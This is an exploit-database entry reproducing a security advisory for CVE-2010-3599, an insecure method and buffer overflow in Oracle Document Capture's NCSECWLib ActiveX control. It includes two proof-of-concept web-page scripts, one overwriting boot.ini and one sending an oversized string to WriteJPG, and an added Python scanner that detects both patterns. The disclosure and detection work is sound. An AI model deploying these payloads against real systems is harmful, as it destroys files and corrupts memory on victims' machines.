Oracle Document Capture 10.1.3.5 Insecure Method / Buffer Overflow

2011-01-26T00:00:00
ID 1337DAY-ID-15117
Type zdt
Reporter Alexandr Polyakov
Modified 2011-01-26T00:00:00

Description

Exploit for the Windows platform in the remote exploits category

                                        
Application:                    Oracle Document Capture
Versions Affected:              Oracle Document Capture 10.1.3.5
Vendor URL:                     http://oracle.com
Bugs:                           Insecure method. Buffer overflow.
Exploits:                       YES
Reported:                       14.12.2009
Vendor response:                15.12.2009
Date of Public Advisory:        24.01.2011
CVE:                            CVE-2010-3599
Author:                         Alexandr Polyakov from DSecRG
 
Description
***********
 
An insecure method was found in the NCSECWLib ActiveX control component, which is part of Oracle Document Capture.
One of its methods (WriteJPG) can be used to overwrite files on the user's system and is also affected by a buffer overflow.
 
 
 
 
Details
*******
 
An attacker can construct an HTML page that calls the vulnerable function "WriteJPG" from the ActiveX object NCSECWLib.
 
Example 1 (file overwrite)
*******
 
 
<html>
<script>
targetFile = "C:\Program Files\Oracle\Document Capture\NCSEcw.dll"
prototype  = "Sub WriteJPG ( ByVal OutputFile As String ,  ByVal Quality As Long ,  ByVal bWriteWorldFile As Boolean )"
memberName = "WriteJPG"
progid     = "NCSECWLib.NCSRenderer"
argCount   = 3
 
arg1="c:\boot.ini"
arg2=1
arg3=True
 
target.WriteJPG arg1 ,arg2 ,arg3
 
</script>
</html>
 
 
Example 2
*******
 
<html>
<script>
targetFile = "C:\Program Files\Oracle\Document Capture\NCSEcw.dll"
prototype  = "Sub WriteJPG ( ByVal OutputFile As String ,  ByVal Quality As Long ,  ByVal bWriteWorldFile As Boolean )"
memberName = "WriteJPG"
progid     = "NCSECWLib.NCSRenderer"
argCount   = 3
 
arg1=String(13332, "A")
arg2=1
arg3=True
 
target.WriteJPG arg1 ,arg2 ,arg3
 
</script>
</html>
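
Detection example (added here, not part of the original advisory and not DSecRG or Oracle code): a heuristic Python scanner for proxy, mail-gateway or web-cache content that flags script invoking WriteJPG with an absolute path or an oversized OutputFile argument, the two patterns shown above. The function name, the regular expressions, the 260-character threshold and the sample inputs are assumptions made for illustration.

```python
import re

# ProgID and method name come from the advisory; MAX_ARG_LEN is an assumed
# threshold (Windows MAX_PATH), not a value from the advisory.
PROGID = "NCSECWLib.NCSRenderer"
MAX_ARG_LEN = 260

# First argument (OutputFile) of "obj.WriteJPG a, b, c" or "obj.WriteJPG(a, b, c)".
CALL_RE = re.compile(r"\.WriteJPG\b\s*\(?\s*([^,\r\n)]+)", re.I)
ASSIGN_RE = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$", re.M)
STRING_FN_RE = re.compile(r"String\(\s*(\d+)", re.I)
ABS_PATH_RE = re.compile(r'"(?:[A-Za-z]:\\|\\\\)')


def scan(page):
    """Return findings for NCSECWLib / WriteJPG use in HTML or script text."""
    findings = []
    if PROGID.lower() in page.lower():
        findings.append("references " + PROGID)
    # Resolve one level of "name = value" so "WriteJPG arg1" maps to its value.
    variables = {n.lower(): v for n, v in ASSIGN_RE.findall(page)}
    for call in CALL_RE.finditer(page):
        arg = call.group(1).strip()
        arg = variables.get(arg.lower(), arg)
        built = STRING_FN_RE.match(arg)
        if built and int(built.group(1)) > MAX_ARG_LEN:
            findings.append("OutputFile built by String(%s, ...)" % built.group(1))
        elif len(arg.strip('"')) > MAX_ARG_LEN:
            findings.append("OutputFile longer than %d characters" % MAX_ARG_LEN)
        elif ABS_PATH_RE.match(arg):
            findings.append("OutputFile is an absolute path: " + arg)
    return findings


# Constructed inputs mirroring the two snippets in the advisory, plus a benign call.
SAMPLE_OVERWRITE = r'''progid = "NCSECWLib.NCSRenderer"
arg1="c:\boot.ini"
target.WriteJPG arg1 ,1 ,True'''
SAMPLE_OVERFLOW = r'''arg1=String(13332, "A")
target.WriteJPG arg1 ,1 ,True'''
SAMPLE_BENIGN = 'renderer.WriteJPG "out.jpg", 75, False'

if __name__ == "__main__":
    for name in ("SAMPLE_OVERWRITE", "SAMPLE_OVERFLOW", "SAMPLE_BENIGN"):
        print(name, scan(globals()[name]))
```

The scanner follows only one level of variable assignment and does not decode obfuscated script, so treat an empty result as "no match" rather than "clean".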
 
 
References
**********
 
http://dsecrg.com/pages/vul/show.php?id=306
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
 
 
 
 
Fix Information
*************
 
Information was published in CPU Jan 2011.
All customers can download CPU patches following instructions from:
 
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html


